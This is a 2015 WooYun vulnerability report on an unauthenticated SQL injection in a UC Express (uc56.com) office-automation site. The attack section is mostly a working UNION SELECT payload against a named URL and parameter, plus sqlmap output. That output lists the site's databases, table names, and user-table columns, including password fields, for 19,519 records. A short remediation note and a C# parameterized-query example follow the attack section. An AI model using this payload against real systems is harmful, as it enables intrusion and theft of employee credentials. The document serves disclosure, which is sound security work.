
Vulnerability summary (followed by 24 users)

Defect ID: wooyun-2015-0151530

Title: SQL injection vulnerability on a UC Express (优速快递) site affects 6 databases

Vendor: uc56.com

Author: 路人甲

Submitted: 2015-11-30 17:57

Fix deadline: 2015-12-05 17:58

Disclosed: 2015-12-05 17:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-11-30: details sent to the vendor, awaiting vendor handling
2015-12-05: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection

Detailed description:

OA (office automation) system

http://ucoa.uc56.com:8088/Login.aspx


Injection point reachable without authentication

http://ucoa.uc56.com:8088/OaWeb/PresonnelMain.aspx?typeid=26


Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NULL--
---
[15:37:56] [INFO] testing Microsoft SQL Server
[15:37:56] [INFO] confirming Microsoft SQL Server
[15:37:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:37:57] [INFO] fetching database names
[15:37:57] [INFO] the SQL query used returns 6 entries
available databases [6]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ucoa
[*] ucweb


Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NULL--
---
[15:39:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:39:14] [INFO] fetching tables for database: ucoa
[15:39:14] [INFO] the SQL query used returns 70 entries
Database: ucoa
[70 tables]
+-------------------+
| Android_User |
| AreaClassfiy |
| AreaClassfiy |
| BackupDatabase |
| BaiDuYuan |
| Client |
| ClientRecord |
| CompanyIMG |
| ContactCenter |
| ContactMessage |
| DemandFeedback |
| Error_User |
| Fax |
| GraphicInfo |
| GraphicItmeInfo |
| ImportantMessages |
| M_DISTRICT |
| Menus |
| N_Collection |
| News |
| Notice_Collection |
| Options |
| Personnel |
| Port_EmpDept |
| Port_EmpStation |
| Program_backup |
| Program_backup |
| Range |
| ReadRecord |
| S_SearchClassfiy |
| ScoreUser_backup |
| ScoreUser_backup |
| SiteNocies |
| SiteNocies |
| Sys_Role |
| TodyVisit |
| UC_Video |
| UcAuthority |
| UcClaim |
| UcClassify |
| UcDemand |
| UcDownload |
| UcMCfy |
| UcMateriaClassify |
| UcMaterial |
| UcMessages |
| UcNotice |
| UcSofoMsg |
| UcSofoMsg |
| UcUnknowngoods |
| UcUserInfo |
| Uc_Port_Dept |
| Uc_Port_Emp |
| Uc_Port_Station |
| V_UnKnownGoods |
| Votes |
| VotesUsers |
| WeiXin2015 |
| WeiXin_User |
| WxProgram |
| WxUser_backup |
| WxUser_backup |
| a_user |
| androidArea |
| android_Version |
| newWxProgram |
| sqlmapoutput |
| test2 |
| test2 |
| weixinuser2015 |
+-------------------+


Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NULL--
---
[15:40:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:40:44] [INFO] fetching tables for database: ucweb
[15:40:44] [INFO] the SQL query used returns 26 entries
Database: ucweb
[26 tables]
+-----------------+
| AdImg |
| Area_info |
| Area_info |
| Company |
| Contact |
| DataBase_Backup |
| Guestbook |
| JoinContact |
| Links |
| Menu |
| NewsType |
| News_Img |
| News_Img |
| Product |
| RGuestbook |
| Range |
| Recruitment |
| ReplyGuestBook |
| ServiceHotline |
| UC_Activity |
| UC_People |
| UcHonor |
| UserInfo |
| WebSite |
| sqlmapoutput |
| tNews |
+-----------------+


Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NULL--
---
[16:09:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[16:09:42] [INFO] fetching columns for table 'UcUserInfo' in database 'ucoa'
[16:09:42] [INFO] the SQL query used returns 21 entries
[16:09:42] [INFO] retrieved: "filesize","nchar"
[16:09:42] [INFO] retrieved: "noticeClassify","varchar"
[16:09:43] [INFO] retrieved: "orgCode","varchar"
[16:09:44] [INFO] retrieved: "orgType","varchar"
[16:09:44] [INFO] retrieved: "UcArea","varchar"
[16:09:44] [INFO] retrieved: "UcAuthority","varchar"
[16:09:44] [INFO] retrieved: "UcAuthorityName","varchar"
[16:09:45] [INFO] retrieved: "UcCenter","varchar"
[16:09:45] [INFO] retrieved: "UcCretae","datetime"
[16:09:46] [INFO] retrieved: "UcEMP","varchar"
[16:09:46] [INFO] retrieved: "UcENABLED","char"
[16:09:47] [INFO] retrieved: "UcID","int"
[16:09:47] [INFO] retrieved: "UcIsimportant","int"
[16:09:47] [INFO] retrieved: "UcIsTop","int"
[16:09:48] [INFO] retrieved: "UCNociteAreaID","nchar"
[16:09:48] [INFO] retrieved: "UcOaAdminEnabled","int"
[16:09:48] [INFO] retrieved: "UcSITE","varchar"
[16:09:48] [INFO] retrieved: "UcUserId","varchar"
[16:09:49] [INFO] retrieved: "UcUserName","varchar"
[16:09:49] [INFO] retrieved: "UcUserPwdAdmin","varchar"
[16:09:49] [INFO] retrieved: "UcUserPwdOa","varchar"
[16:09:50] [INFO] fetching entries for table 'UcUserInfo' in database 'ucoa'
[16:09:50] [INFO] the SQL query used returns 19519 entries


The contents of the user table were not dumped.

Proof of vulnerability:

Fix recommendation:

Filter SQL special characters
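As an added example (not the vendor's code), the hardening a practitioner would apply to the injectable endpoint, which removes the need for special-character filtering: a hypothetical ASP.NET code-behind for a page like OaWeb/PresonnelMain.aspx that requires a logged-in user, accepts typeid only as an integer, and binds it as a typed SqlCommand parameter. The connection-string name "ucoa", the Personnel column names and the GridView named grid are assumptions.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;

public partial class PresonnelMain : Page
{
    // The injectable pattern this report describes splices the query string into SQL:
    //     "... WHERE typeid = " + Request.QueryString["typeid"]
    // so "26 UNION ALL SELECT ..." is executed verbatim. The hardened form below binds
    // a typed parameter instead: SQL Server receives a placeholder and an integer and
    // never re-parses attacker-controlled text. Column names are assumed.
    private static DataTable LoadPersonnel(SqlConnection conn, int typeid)
    {
        var cmd = new SqlCommand(
            "SELECT title, body, created FROM Personnel WHERE typeid = @typeid", conn);
        cmd.Parameters.Add("@typeid", SqlDbType.Int).Value = typeid;
        var dt = new DataTable();
        new SqlDataAdapter(cmd).Fill(dt);
        return dt;
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        // The report shows the endpoint answering anonymous requests: require a login first.
        if (!Request.IsAuthenticated)
        {
            Response.StatusCode = 401;
            Response.End();
            return;
        }
        // Accept only a plain non-negative integer; anything else never reaches SQL.
        int typeid;
        if (!int.TryParse(Request.QueryString["typeid"], out typeid) || typeid < 0)
        {
            Response.StatusCode = 400;
            Response.End();
            return;
        }
        var cs = ConfigurationManager.ConnectionStrings["ucoa"].ConnectionString; // assumed name
        using (var conn = new SqlConnection(cs))
        {
            conn.Open();
            grid.DataSource = LoadPersonnel(conn, typeid); // 'grid' is a GridView on the .aspx
            grid.DataBind();
        }
    }
}
```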

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-12-05 17:58

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None